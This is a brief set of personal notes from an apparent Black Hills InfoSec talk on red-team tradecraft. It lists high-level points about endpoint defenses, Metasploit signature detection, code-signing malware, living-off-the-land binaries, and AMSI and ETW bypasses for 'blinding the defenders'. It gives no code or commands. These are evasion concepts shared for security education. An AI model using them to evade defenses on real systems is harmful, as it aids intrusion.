My key takeaways
- it’s getting harder to execute malware in a lot of environments, also due to endpoint maturity
- 3 parts of an assumed compromise: priv esc, lateral movement, senstive data access
- Win10 is safer then ever, also Windows Defender has improved
- defense vendors have signatures for almost all metaspoilt machine code
- nowadays you can’t use a commodity framework and get away with it as an attacker/red teamer
- code signing becomes also relevant for red teamers to get malware run
- live of the land becomes more and more mandatory (LOLBAS)
- Best EDR? Manually…!
- "blinding the defenders": AMSI amusements and ETW bypass
Env
- Provided by blackhillsinfosec.com
- Presenter: Joff Thyer
- Slides